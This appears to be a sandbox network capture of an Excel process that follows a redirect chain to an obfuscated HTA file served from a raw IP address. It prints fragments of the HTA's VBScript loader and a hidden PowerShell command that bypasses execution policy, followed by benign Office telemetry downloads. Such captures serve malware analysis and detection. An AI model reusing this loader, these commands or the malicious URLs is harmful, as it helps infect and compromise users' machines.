                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                              Last-Modified: Wed, 12 Mar 2025 07:13:42 GMT
                                                              ETag: "3aec-6301ff20702d7"
                                                              Accept-Ranges: bytes
                                                              Content-Length: 15084
                                                              Keep-Alive: timeout=5, max=100
                                                              Connection: Keep-Alive
                                                              Content-Type: application/hta
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 6d 75 6c 61 74 65 49 45 38 22 20 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 53 63 72 69 50 74 20 4c 61 6e 47 55 61 67 65 3d 22 56 42 73 43 72 69 70 54 22 3e 0d 0a 44 69 6d 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 50 54 4d 45 4b 45 4d [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" ><html><body><ScriPt LanGUage="VBsCripT">Dim xPTMEKEMxPBxWLUhRterfoGvllfnYkHwtBtpRlqFJHymQtdmJwmdyBOfCSoylTuXGyxrWvqVRUvnoAciqrcburBoOcbinvOOgVpspcnJSSBaMUAWItKMpzCVQeBSAFxZOhbUrUNXHOXcFrdEFRrMEMydDmWgsleEAvRzxMBNeYTUpEwhdafDHUYNWOuxldqFkcTJdtifeJvfjxlHYijNVKJbQaduzUQeNpoZEEtcEmNiKKffjEKQ ,
                                                              Mar 12, 2025 18:30:31.489020109 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 45 70 65 75 61 44 56 6b 61 43 71 6f 71 70 66 56 42 41 74 4d 75
                                                              Data Ascii: EpeuaDVkaCqoqpfVBAtMubBsMUFrlrWHGnTatSULezaIHQlGrnvJuCxhEHyukWxnrAeClVQJcajTPdvoBjlDSYUIAuGNzThFfPubzbQHpUAVKpTwzcxvHFZwXUNyZyhlsVyzcydfnXGQnPMGGGOnKKWYoWBDFYIFyHXYQCLGqWjFtTisrKRgVC
                                                              Mar 12, 2025 18:30:31.489031076 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                              Data Ascii: =
                                                              Mar 12, 2025 18:30:31.489037037 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                              Data Ascii: )
                                                              Mar 12, 2025 18:30:31.489044905 CET896INData Raw: 20 20 20 20 20 20 20 20 2d 65 78 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 79 70 61 53 53 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                              Data Ascii: -ex bypaSS -noP -W 1 -c dEvIcecredENt
                                                              Mar 12, 2025 18:30:31.489051104 CET1236INData Raw: 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 51 59 6b 39 46 53 47 49 73 63 33 52 79 61 57 35 6e 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 48
                                                              Data Ascii: ICAgICAgICAgICAgICBQYk9FSGIsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRRb0dOQ0NMZ1Esc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9lUUNPLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWtkT0FNWGMsSW50UHRyICAgICAgICAgICA
                                                              Mar 12, 2025 18:30:31.489058018 CET224INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                              Data Ascii: : xPTMEKEM
                                                              Mar 12, 2025 18:30:31.489284039 CET1236INData Raw: 78 50 42 78 57 4c 55 68 52 74 65 72 66 6f 47 76 6c 6c 66 6e 59 6b 48 77 74 42 74 70 52 6c 71 46 4a 48 79 6d 51 74 64 6d 4a 77 6d 64 79 42 4f 66 43 53 6f 79 6c 54 75 58 47 79 78 72 57 76 71 56 52 55 76 6e 6f 41 63 69 71 72 63 62 75 72 42 6f 4f 63
                                                              Data Ascii: xPBxWLUhRterfoGvllfnYkHwtBtpRlqFJHymQtdmJwmdyBOfCSoylTuXGyxrWvqVRUvnoAciqrcburBoOcbinvOOgVpspcnJSSBaMUAWItKMpzCVQeBSAFxZOhbUrUNXHOXcFrdEFRrMEMydDmWgsleEAvRzxMBNeYTUpEwhdafDHUYNWOuxldqFkcTJdtifeJvfjxlHYijNVKJbQaduzUQeNpoZEEtcEmNiKKffjEKQ.run
                                                              Mar 12, 2025 18:30:31.489325047 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                              Data Ascii: & xPTMEKEMxPBxWLUhRte
                                                              Mar 12, 2025 18:30:31.489336967 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                              Data Ascii: chr
                                                              Mar 12, 2025 18:30:31.494426966 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                              Data Ascii: (


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.1049700104.21.68.1204437116C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                              TimestampBytes transferredDirectionData
                                                              2025-03-12 17:30:26 UTC231OUTGET /HhPRgN?&pot=fanatical&buckle=innate&gazelle HTTP/1.1
                                                              Accept: */*
                                                              Accept-Encoding: gzip, deflate
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                              Host: arnogo.net
                                                              Connection: Keep-Alive
                                                              2025-03-12 17:30:27 UTC1326INHTTP/1.1 302 Found
                                                              Date: Wed, 12 Mar 2025 17:30:27 GMT
                                                              Content-Type: text/plain; charset=utf-8
                                                              Content-Length: 110
                                                              Connection: close
                                                              Set-Cookie: p_uv_id=3078ece1e72692856ab070bceb3572c4; path=/; expires=Thu, 13-Mar-25 16:00:00 GMT; HttpOnly
                                                              x-dns-prefetch-control: off
                                                              x-frame-options: SAMEORIGIN
                                                              strict-transport-security: max-age=15552000; includeSubDomains
                                                              strict-transport-security: max-age=31536000
                                                              x-download-options: noopen
                                                              x-content-type-options: nosniff
                                                              x-content-type-options: nosniff
                                                              x-xss-protection: 1; mode=block
                                                              x-xss-protection: 1; mode=block
                                                              location: https://link.saja.market/0g9CmGVAcw?&fixture=numerous&airline=rich&fen=efficient&january
                                                              vary: Accept
                                                              cf-cache-status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9qQjne8E9azWwQX5mZ0rC07X2%2BXqNBUBfR4ko4QkvbfPEJCdKO%2BV0rBm31gBBx8wlgAL%2FFmahId60gQ8Qg9Ill4xjpLvn5NRBgyfZQS2LVVB4Yyes9BacwZxte4o"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 91f504fbdf149aeb-MIA
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=55194&min_rtt=44049&rtt_var=20629&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2346&recv_bytes=813&delivery_rate=58043&cwnd=32&unsent_bytes=0&cid=08cd3d069d98c596&ts=1467&x=0"
                                                              2025-03-12 17:30:27 UTC43INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 6c 69 6e 6b 2e 73 61 6a 61 2e 6d 61 72
                                                              Data Ascii: Found. Redirecting to https://link.saja.mar
                                                              2025-03-12 17:30:27 UTC67INData Raw: 6b 65 74 2f 30 67 39 43 6d 47 56 41 63 77 3f 26 66 69 78 74 75 72 65 3d 6e 75 6d 65 72 6f 75 73 26 61 69 72 6c 69 6e 65 3d 72 69 63 68 26 66 65 6e 3d 65 66 66 69 63 69 65 6e 74 26 6a 61 6e 75 61 72 79
                                                              Data Ascii: ket/0g9CmGVAcw?&fixture=numerous&airline=rich&fen=efficient&january


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.10497023.39.89.1524437116C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                              TimestampBytes transferredDirectionData
                                                              2025-03-12 17:30:30 UTC257OUTGET /0g9CmGVAcw?&fixture=numerous&airline=rich&fen=efficient&january HTTP/1.1
                                                              Accept: */*
                                                              Accept-Encoding: gzip, deflate
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Host: link.saja.market
                                                              2025-03-12 17:30:30 UTC524INHTTP/1.1 302 Found
                                                              Date: Wed, 12 Mar 2025 17:30:30 GMT
                                                              Content-Type: text/plain; charset=utf-8
                                                              Content-Length: 109
                                                              Connection: close
                                                              x-dns-prefetch-control: off
                                                              x-frame-options: SAMEORIGIN
                                                              strict-transport-security: max-age=15552000; includeSubDomains
                                                              x-download-options: noopen
                                                              x-content-type-options: nosniff
                                                              x-xss-protection: 1; mode=block
                                                              location: http://104.168.7.38/xampp/kscc/scc/everynicepersonwalkingentireplacesgoodformegreat.hta
                                                              vary: Accept
                                                              x-envoy-upstream-service-time: 4
                                                              server: istio-envoy
                                                              2025-03-12 17:30:30 UTC109INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 30 34 2e 31 36 38 2e 37 2e 33 38 2f 78 61 6d 70 70 2f 6b 73 63 63 2f 73 63 63 2f 65 76 65 72 79 6e 69 63 65 70 65 72 73 6f 6e 77 61 6c 6b 69 6e 67 65 6e 74 69 72 65 70 6c 61 63 65 73 67 6f 6f 64 66 6f 72 6d 65 67 72 65 61 74 2e 68 74 61
                                                              Data Ascii: Found. Redirecting to http://104.168.7.38/xampp/kscc/scc/everynicepersonwalkingentireplacesgoodformegreat.hta


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              2192.168.2.104970513.107.246.674437116C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                              TimestampBytes transferredDirectionData
                                                              2025-03-12 17:30:43 UTC226OUTGET /rules/excel.exe-Production-v19.bundle HTTP/1.1
                                                              Connection: Keep-Alive
                                                              Accept-Encoding: gzip
                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                                              Host: otelrules.svc.static.microsoft
                                                              2025-03-12 17:30:47 UTC472INHTTP/1.1 200 OK
                                                              Date: Wed, 12 Mar 2025 17:30:44 GMT
                                                              Content-Type: text/plain
                                                              Content-Length: 1114783
                                                              Connection: close
                                                              Vary: Accept-Encoding
                                                              Cache-Control: public
                                                              Last-Modified: Mon, 10 Mar 2025 13:15:17 GMT
                                                              ETag: "0x8DD5FD59A686EBF"
                                                              x-ms-request-id: 8098c8e9-401e-0016-6929-9253e0000000
                                                              x-ms-version: 2018-03-28
                                                              x-azure-ref: 20250312T173044Z-17846f7ff65lbsv9hC1BL1c43n00000006ag00000000ertp
                                                              x-fd-int-roxy-purgeid: 0
                                                              X-Cache: TCP_HIT
                                                              Accept-Ranges: bytes
                                                              2025-03-12 17:30:47 UTC15912INData Raw: 31 30 30 30 34 32 76 32 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 34 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 55 58 2e 44 65 73 6b 74 6f 70 2e 4f 66 66 69 63 65 54 68 65 6d 65 2e 41 70 70 2e 49 6e 69 74 22 20 41 54 54 3d 22 63 34 33 38 38 63 39 37 37 32 39 37 34 31 33 62 62 30 35 34 62 61 64 31 61 63 66 30 61 64 65 31 2d 63 63 35 38 65 35 33 65 2d 66 35 61 34 2d 34 66 33 37 2d 62 30 64 32 2d 39 61 38 30 37 39 65 33 34 34 32 30 2d 36 38 37 39 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 63 6d 39 79 35
                                                              Data Ascii: 100042v2+<?xml version="1.0" encoding="utf-8"?><R Id="100042" V="2" DC="SM" EN="Office.UX.Desktop.OfficeTheme.App.Init" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="cm9y5
                                                              2025-03-12 17:30:47 UTC16384INData Raw: 21 23 3e 31 30 30 31 31 37 76 30 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 31 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 38 79 6c 6c 66 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 56 20 56 3d 22 43 6c 69 63 6b 22 20 54 3d 22 57 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20
                                                              Data Ascii: !#>100117v0+<?xml version="1.0" encoding="utf-8"?><R Id="100117" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="8yllf" /> </S> <C T="W" I="0" O="false"> <V V="Click" T="W" /> </C> <C T="U32" I="1" O="false">
                                                              2025-03-12 17:30:47 UTC16384INData Raw: 3c 53 20 54 3d 22 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 33 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 37 38 31 76 31 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 37 38 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 62 67 6f 34 74 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 68 6c 76 79 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 49 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20
                                                              Data Ascii: <S T="2" /> <S T="3" /> </T></R><$!#>10781v1+<?xml version="1.0" encoding="utf-8"?><R Id="10781" V="1" DC="SM" T="Subrule" xmlns=""> <S> <UTS T="1" Id="bgo4t" /> <UTS T="2" Id="bhlvy" /> </S> <C T="I32" I="0" O="false">
                                                              2025-03-12 17:30:47 UTC16384INData Raw: 20 20 20 3c 4f 20 54 3d 22 47 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 31 30 30 30 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20
                                                              Data Ascii: <O T="GT"> <L> <S T="1" F="0" /> </L> <R> <V V="1000" T="U32" /> </R> </O> </L> <R> <O T="LE"> <L> <S
                                                              2025-03-12 17:30:47 UTC16384INData Raw: 46 6c 79 6f 75 74 56 69 64 65 6f 43 61 6c 6c 56 69 64 65 6f 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 36 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 33 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 53 61 53 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 34 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 4f 76 65 72 66 6c 6f 77 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20
                                                              Data Ascii: FlyoutVideoCallVideo"> <C> <S T="26" /> </C> </C> <C T="U32" I="23" O="false" N="FlyoutSaS"> <C> <S T="27" /> </C> </C> <C T="U32" I="24" O="false" N="FlyoutOverflow"> <C> <S T="28" /> </C>
                                                              2025-03-12 17:30:47 UTC16384INData Raw: 49 64 3d 22 31 30 39 30 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 4e 44 42 2e 55 6e 6b 6e 6f 77 6e 2e 43 6f 72 72 75 70 74 69 6f 6e 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 53 3d 22 31 30 30 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 45 74 77 20 54 3d 22 31 22 20 45 3d 22 33 39 35 22 20 47 3d 22 7b 32 61 64 66 38 65 32 33 2d 30 61 66 39 2d 34 33 63 39 2d 62 61 34 63 2d 39 35 32 65 65 31 33 30 35 34 30
                                                              Data Ascii: Id="10907" V="0" DC="SM" EN="Office.Outlook.Desktop.NDB.Unknown.Corruption" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" S="100" DCa="PSU" xmlns=""> <S> <Etw T="1" E="395" G="{2adf8e23-0af9-43c9-ba4c-952ee130540
                                                              2025-03-12 17:30:47 UTC16384INData Raw: 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 33 22 20 49 64 3d 22 62 70 66 79 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 34 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 50 68 6f 74 6f 53 69 7a 65 49 6e 42 79 74 65 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 30 22 20 54 3d 22 55 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 36 34 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d
                                                              Data Ascii: > <UTS T="3" Id="bpfy1" /> <F T="4"> <O T="GT"> <L> <S T="3" F="PhotoSizeInBytes" /> </L> <R> <V V="0" T="U64" /> </R> </O> </F> </S> <C T="U64" I="0" O="true" N=
                                                              2025-03-12 17:30:47 UTC16384INData Raw: 22 34 22 20 46 3d 22 65 76 65 6e 74 49 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 31 33 35 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 74 63 69 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 37 38 35 32 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d
                                                              Data Ascii: "4" F="eventId" /> </L> <R> <V V="135" T="I32" /> </R> </O> </F> <F T="7"> <O T="EQ"> <L> <S T="5" F="tcid" /> </L> <R> <V V="27852" T="I32" />
                                                              2025-03-12 17:30:47 UTC16384INData Raw: 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 46 69 6c 65 50 72 6f 74 65 63 74 69 6f 6e 53 74 61 74 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 35 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 4f 66 54 68 72 6f 77 6e 45 78 63 65 70 74 69 6f 6e 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d
                                                              Data Ascii: <O T="EQ"> <L> <S T="3" F="FileProtectionState" /> </L> <R> <V V="5" T="U32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="CountOfThrownException"> <C> <S T=
                                                              2025-03-12 17:30:47 UTC16384INData Raw: 3d 22 72 65 73 75 6c 74 73 5f 49 73 4e 75 6c 6c 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 35
                                                              Data Ascii: ="results_IsNull" /> </L> <R> <V V="false" T="B" /> </R> </O> </L> <R> <O T="EQ"> <L> <S T="5


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              3192.168.2.104970613.107.246.674437116C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                              TimestampBytes transferredDirectionData
                                                              2025-03-12 17:30:55 UTC214OUTGET /rules/rule120603v8s19.xml HTTP/1.1
                                                              Connection: Keep-Alive
                                                              Accept-Encoding: gzip
                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                                              Host: otelrules.svc.static.microsoft
                                                              2025-03-12 17:30:56 UTC494INHTTP/1.1 200 OK
                                                              Date: Wed, 12 Mar 2025 17:30:55 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 2128
                                                              Connection: close
